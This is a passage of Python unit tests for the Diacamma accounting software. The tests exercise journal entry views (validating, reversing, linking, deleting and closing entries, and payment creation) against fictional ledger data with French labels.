self.assert_json_equal('', 'entryline/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entryline/@0/credit', 152.34)
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('LABELFORM', 'result', [0.00, 152.34, -152.34, 0.00, 0.00])
self.factory.xfer = EntryAccountOpenFromLine()
self.calljson('/diacamma.accounting/entryAccountOpenFromLine',
{'year': '1', 'journal': '2', 'filter': '0', 'entryline': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountOpenFromLine')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountShow")
self.assertEqual(self.response_json['action']['params'], None)
self.assertEqual(len(self.json_context), 5)
self.assertEqual(self.json_context['filter'], "0")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.assertEqual(self.json_context['entryaccount'], 1)
self.factory.xfer = EntryAccountShow()
self.calljson('/diacamma.accounting/entryAccountShow',
{'year': '1', 'journal': '2', 'filter': '0', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountShow')
self.assert_count_equal('', 8)
self.assert_json_equal('LABELFORM', 'num', '1')
self.assert_json_equal('LABELFORM', 'journal', 'Achats')
self.assert_json_equal('LABELFORM', 'date_entry', date.today().isoformat(), True)
self.assert_json_equal('LABELFORM', 'date_value', '2015-02-13')
self.assert_json_equal('LABELFORM', 'designation', 'un plein cadie')
self.assert_count_equal('entrylineaccount', 2)
self.assert_json_equal('', 'entrylineaccount/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entrylineaccount/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entrylineaccount/@1/costaccounting', None)
self.assert_count_equal('#entrylineaccount/actions', 0)
self.assertEqual(len(self.json_actions), 2)
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryAccountCreateLinked")
self.factory.xfer = CostAccountingAddModify()
self.calljson('/diacamma.accounting/costAccountingAddModify', {"SAVE": "YES", 'name': 'aaa', 'description': 'aaa', 'year': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'costAccountingAddModify') # id = 3
self.factory.xfer = EntryAccountShow()
self.calljson('/diacamma.accounting/entryAccountShow',
{'year': '1', 'journal': '2', 'filter': '0', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountShow')
self.assert_count_equal('entrylineaccount', 2)
self.assert_json_equal('', 'entrylineaccount/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entrylineaccount/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entrylineaccount/@1/costaccounting', None)
self.assert_count_equal('#entrylineaccount/actions', 1)
self.assertEqual(len(self.json_actions), 2)
def test_show_close_cost(self):
fill_entries_fr(1)
self.factory.xfer = EntryAccountOpenFromLine()
self.calljson('/diacamma.accounting/entryAccountOpenFromLine',
{'year': '1', 'journal': '0', 'filter': '0', 'entryline': '23'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountOpenFromLine')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountShow")
self.assertEqual(self.response_json['action']['params'], None)
self.assertEqual(len(self.json_context), 5)
self.assertEqual(self.json_context['filter'], "0")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "0")
self.assertEqual(self.json_context['entryaccount'], 11)
self.factory.xfer = EntryAccountShow()
self.calljson('/diacamma.accounting/entryAccountShow',
{'year': '1', 'journal': '0', 'filter': '0', 'entryaccount': '11'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountShow')
self.assert_count_equal('', 8)
self.assert_json_equal('LABELFORM', 'num', '7')
self.assert_json_equal('LABELFORM', 'journal', 'Opérations diverses')
self.assert_json_equal('LABELFORM', 'date_value', '2015-02-20')
self.assert_json_equal('LABELFORM', 'designation', 'Frais bancaire')
self.assert_count_equal('entrylineaccount', 2)
self.assert_json_equal('', 'entrylineaccount/@0/entry_account', '[512] 512')
self.assert_json_equal('', 'entrylineaccount/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount/@1/entry_account', '[627] 627')
self.assert_json_equal('', 'entrylineaccount/@1/costaccounting', 'close')
self.assert_count_equal('#entrylineaccount/actions', 0)
self.assertEqual(len(self.json_actions), 1)
def test_inverse_entry(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-2|12|0|152.340000|0|0|None|\n-3|4|3|152.340000|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assertEqual(len(self.json_actions), 5)
self.assertEqual(self.json_actions[1]['id'], "diacamma.accounting/entryAccountClose")
self.assertEqual(self.json_actions[2]['id'], "diacamma.accounting/entryAccountCreateLinked")
self.assertEqual(self.json_actions[3]['id'], "diacamma.accounting/entryAccountReverse")
self.factory.xfer = EntryAccountReverse()
self.calljson('/diacamma.accounting/entryAccountReverse',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountReverse')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 14)
self.assert_json_equal('LABELFORM', 'asset_warning', "écriture d'un avoir")
self.assert_json_equal('', '#asset_warning/formatstr', "{[center]}{[i]}%s{[/i]}{[/center]}")
def test_valid_payment(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-2|12|0|152.340000|0|0|None|\n-3|4|3|152.340000|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountCreateLinked()
self.calljson('/diacamma.accounting/entryAccountCreateLinked',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountCreateLinked')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(len(self.response_json['action']['params']), 5)
self.assertEqual(self.response_json['action']['params']['entryaccount'], 2)
self.assertEqual(self.response_json['action']['params']['linked_entryaccount'], 1)
self.assertEqual(self.response_json['action']['params']['serial_entry'][-26:-1], "|4|3|-152.340000|0|0|None")
self.assertEqual(self.response_json['action']['params']['num_cpt_txt'], "5")
self.assertEqual(self.response_json['action']['params']['journal'], "4")
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], "1")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'year': '1', 'journal': '4', 'entryaccount': '2', 'linked_entryaccount': '1',
'serial_entry': "-3|4|3|-152.340000|0|0|None|", 'num_cpt_txt': '5'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 16)
self.assert_json_equal('SELECT', 'journal', '4')
self.assert_json_equal('DATE', 'date_value', '2015-12-31')
self.assert_json_equal('EDIT', 'designation', 'règlement de un plein cadie')
self.assert_count_equal('entrylineaccount_serial', 1)
self.assert_json_equal('EDIT', 'num_cpt_txt', '5')
self.assert_json_equal('SELECT', 'num_cpt', '2')
self.assert_select_equal('num_cpt', 2) # nb=2
self.assert_json_equal('FLOAT', 'debit_val', '0.00')
self.assert_json_equal('FLOAT', 'credit_val', '152.34')
self.assert_json_equal('EDIT', 'reference', '')
self.assert_count_equal('entrylineaccount_serial', 1)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', -152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'year': '1', 'journal': '2', 'entryaccount': '2', 'linked_entryaccount': '1',
'serial_entry': "-3|4|3|-152.340000|0|0|None|\n-4|2|0|-152.340000|0|0|Ch N°12345|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 2)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', -152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/entry_account', '[512] 512')
self.assert_json_equal('', 'entrylineaccount_serial/@1/debit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@1/credit', 152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@1/reference', 'Ch N°12345')
self.assert_json_equal('', 'entrylineaccount_serial/@1/costaccounting', None)
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '1', 'journal': '2', 'entryaccount': '2', 'linked_entryaccount': '1',
'serial_entry': "-3|4|3|-152.340000|0|0|None||\n-4|2|0|-152.340000|0|0|Ch N°12345|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 4)
self.assert_json_equal('', 'entryline/@0/entry.num', None)
self.assert_json_equal('', 'entryline/@0/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-02-13')
self.assert_json_equal('', 'entryline/@0/link', 'A')
self.assert_json_equal('', 'entryline/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entryline/@0/credit', 152.34)
self.assert_json_equal('', 'entryline/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@2/entry.num', None)
self.assert_json_equal('', 'entryline/@2/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@2/entry.date_value', '2015-12-31')
self.assert_json_equal('', 'entryline/@2/link', 'A')
self.assert_json_equal('', 'entryline/@2/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entryline/@2/debit', -152.34)
self.assert_json_equal('', 'entryline/@3/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@3/link', None)
self.assert_json_equal('LABELFORM', 'result', [0.00, 152.34, -152.34, -152.34, 0.00])
def test_valid_payment_canceled(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-2|12|0|152.340000|0|0|None|\n-3|4|3|152.340000|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.assertEqual(1, EntryAccount.objects.all().count())
self.factory.xfer = EntryAccountCreateLinked()
self.calljson('/diacamma.accounting/entryAccountCreateLinked',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountCreateLinked')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(len(self.response_json['action']['params']), 5)
self.assertEqual(self.response_json['action']['params']['serial_entry'][-26:-1], "|4|3|-152.340000|0|0|None")
self.assertEqual(len(self.json_context), 3)
self.assertEqual(2, EntryAccount.objects.all().count())
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'year': '1', 'journal': '4', 'entryaccount': '2', 'linked_entryaccount': '1',
'serial_entry': "-3|4|3|-152.340000|0|0|None|", 'num_cpt_txt': '5'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 16)
self.factory.xfer = EntryAccountUnlock()
self.calljson('/diacamma.accounting/entryAccountUnlock', {'year': '1', 'journal': '4', 'entryaccount': '2', 'linked_entryaccount': '1',
'serial_entry': "-3|4|3|-152.340000|0|0|None|", 'num_cpt_txt': '5'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountUnlock')
self.assertEqual(1, EntryAccount.objects.all().count())
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/entry.num', None)
self.assert_json_equal('', 'entryline/@0/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-02-13')
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entryline/@0/credit', 152.34)
self.assert_json_equal('', 'entryline/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
def test_link_unlink_entries(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-04-27', 'designation': 'Une belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "-6|9|0|364.91|0|0|None|\n-7|1|5|364.91|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '4', 'date_value': '2015-05-03',
'designation': 'Règlement de belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '1', 'journal': '4', 'entryaccount': '2',
'serial_entry': "-9|1|5|-364.91|0|0|None|\n-8|2|0|364.91|0|0|BP N°987654|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '5',
'date_value': '2015-04-27', 'designation': 'divers'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate', {'year': '1', 'journal': '2', 'entryaccount': '3',
'serial_entry': "-11|1|6|-364.91|0|0|None|\n-12|1|5|250.61|0|0|None|\n-13|1|7|114.30|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList', {'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 7)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/entry.num', None)
self.assert_json_equal('', 'entryline/@0/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-04-27')
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/debit', -364.91)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/id', '1')
self.assert_json_equal('', 'entryline/@1/entry_account', '[706] 706')
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('', 'entryline/@2/id', '6')
self.assert_json_equal('', 'entryline/@2/entry_account', "[411 Dalton William]")
self.assert_json_equal('', 'entryline/@2/debit', -250.61)
self.assert_json_equal('', 'entryline/@3/id', '5')
self.assert_json_equal('', 'entryline/@3/entry_account', "[411 Dalton Jack]")
self.assert_json_equal('', 'entryline/@3/credit', 364.91)
self.assert_json_equal('', 'entryline/@4/id', '7')
self.assert_json_equal('', 'entryline/@4/entry_account', "[411 Dalton Joe]")
self.assert_json_equal('', 'entryline/@4/debit', -114.30)
self.assert_json_equal('', 'entryline/@5/id', '3')
self.assert_json_equal('', 'entryline/@5/entry.num', None)
self.assert_json_equal('', 'entryline/@5/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@5/entry.date_value', '2015-05-03')
self.assert_json_equal('', 'entryline/@5/link', None)
self.assert_json_equal('', 'entryline/@5/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@5/credit', 364.91)
self.assert_json_equal('', 'entryline/@5/costaccounting', None)
self.assert_json_equal('', 'entryline/@6/id', '4')
self.assert_json_equal('', 'entryline/@6/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@6/designation_ref', 'Règlement de belle facture{[br/]}BP N°987654')
self.assert_json_equal('', 'entryline/@6/costaccounting', None)
self.assert_json_equal('LABELFORM', 'result', [364.91, 0.00, 364.91, 364.91, 0.00])
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'year': '1', 'journal': '0', 'filter': '0', 'entryline': '2;3'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountLink')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList', {'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('entryline', 7)
self.assert_json_equal('', 'entryline/@0/id', '2')
self.assert_json_equal('', 'entryline/@0/link', 'A')
self.assert_json_equal('', 'entryline/@1/id', '1')
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@5/id', '3')
self.assert_json_equal('', 'entryline/@5/link', 'A')
self.assert_json_equal('', 'entryline/@6/id', '4')
self.assert_json_equal('', 'entryline/@6/link', None)
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'CONFIRME': 'YES', 'year': '1', 'journal': '0', 'filter': '0', 'entryline': '3'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountLink')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList', {'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('entryline', 7)
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@2/link', None)
self.assert_json_equal('', 'entryline/@3/link', None)
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'year': '1', 'journal': '0', 'filter': '0', 'entryline': '1;2'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryAccountLink')
self.assert_json_equal('', 'message', "Une ligne d'écriture n'a pas de compte de tiers !")
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'year': '1', 'journal': '0', 'filter': '0', 'entryline': '2;5'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryAccountLink')
self.assert_json_equal('', 'message', "Ces lignes d'écritures ne concernent pas le même tiers !")
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink', {'year': '1', 'journal': '0', 'filter': '0', 'entryline': '2;6'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryAccountLink')
self.assert_json_equal('', 'message', "Ces lignes d'écritures ne s'équilibrent pas !")
def test_delete_lineentry(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-04-27', 'designation': 'Une belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-6|9|0|364.91|0|0|None|\n-7|1|5|364.91|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 2)
self.assertEqual(len(self.json_actions), 5)
self.factory.xfer = EntryLineAccountDel()
self.calljson('/diacamma.accounting/entryLineAccountDel', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "1|9|0|364.91|0|0|None|\n2|1|5|364.91|0|0|None|", "entrylineaccount_serial": '2'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountDel')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(len(self.response_json['action']['params']), 1)
self.assertEqual(self.response_json['action']['params']['serial_entry'], "1|9|0|364.910000|0|0|None|")
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], "1")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', "entrylineaccount_serial": '2', 'serial_entry': "1|9|0|364.91|0|0|None|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 1)
self.assertEqual(len(self.json_actions), 2)
def test_delete_entries(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-04-27', 'designation': 'Une belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-6|9|0|364.91|0|0|None|\n-7|1|5|364.91|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '4',
'date_value': '2015-05-03', 'designation': 'Règlement de belle facture'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '4', 'entryaccount': '2', 'serial_entry': "-9|1|5|-364.91|0|0|None|\n-8|2|0|364.91|0|0|BP N°987654|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountLink()
self.calljson('/diacamma.accounting/entryAccountLink',
{'year': '1', 'journal': '0', 'filter': '0', 'entryline': '2;3'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountLink')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 4)
self.assert_json_equal('', 'entryline/@0/link', 'A')
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@1/entry_account', '[706] 706')
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('', 'entryline/@2/link', 'A')
self.assert_json_equal('', 'entryline/@2/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@2/costaccounting', None)
self.assert_json_equal('', 'entryline/@3/link', None)
self.assert_json_equal('', 'entryline/@3/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@3/costaccounting', None)
self.factory.xfer = EntryAccountDel()
self.calljson('/diacamma.accounting/entryAccountDel',
{'CONFIRME': 'YES', 'year': '1', 'journal': '0', 'filter': '0', 'entryline': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountDel')
self.factory.xfer = EntryAccountClose()
self.calljson('/diacamma.accounting/entryAccountClose',
{'CONFIRME': 'YES', 'year': '1', 'journal': '0', 'filter': '0', "entryline": "3"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountClose')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '0', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/entry.num', '1')
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/entry_account', '[411 Dalton William]')
self.assert_json_equal('', 'entryline/@1/entry_account', '[512] 512')
self.assert_json_equal('', 'entryline/@1/debit', -364.91)
self.assert_json_equal('', 'entryline/@1/designation_ref', 'Règlement de belle facture{[br/]}BP N°987654')
self.assert_json_equal('LABELFORM', 'result', [0.00, 0.00, 0.00, 364.91, 364.91])
self.factory.xfer = EntryAccountDel()
self.calljson('/diacamma.accounting/entryAccountDel',
{'year': '1', 'journal': '0', 'filter': '0', 'entryline': '3'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryAccountDel')
self.assert_json_equal('', 'message', 'écriture validée !')
def test_buyingselling_in_report(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '1',
'date_value': '2015-03-21', 'designation': 'mauvais report'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '1', 'entryaccount': '1', 'num_cpt_txt': '70',
'num_cpt': '9', 'third': 0, 'debit_val': '0.0', 'credit_val': '152.34'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryLineAccountAdd')
self.assert_json_equal('', 'message', "Ce type d'écriture n'est pas permis dans ce journal !")
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '1', 'entryaccount': '1', 'num_cpt_txt': '60',
'num_cpt': '13', 'third': 0, 'debit_val': '0.0', 'credit_val': '152.34'}, False)
self.assert_observer('core.exception', 'diacamma.accounting', 'entryLineAccountAdd')
self.assert_json_equal('', 'message', "Ce type d'écriture n'est pas permis dans ce journal !")
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '1', 'entryaccount': '1', 'num_cpt_txt': '401',
'num_cpt': '4', 'third': 0, 'debit_val': '0.0', 'credit_val': '152.34'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
def test_import_entries(self):
default_costaccounting()
fill_thirds_fr()
csv_content = """date;code;description;debit;credit;third;cost;ref
04/09/2015;512; Retrait;1 000,00;;;;
04/09/2015;531; Retrait;;1 000,00;;;
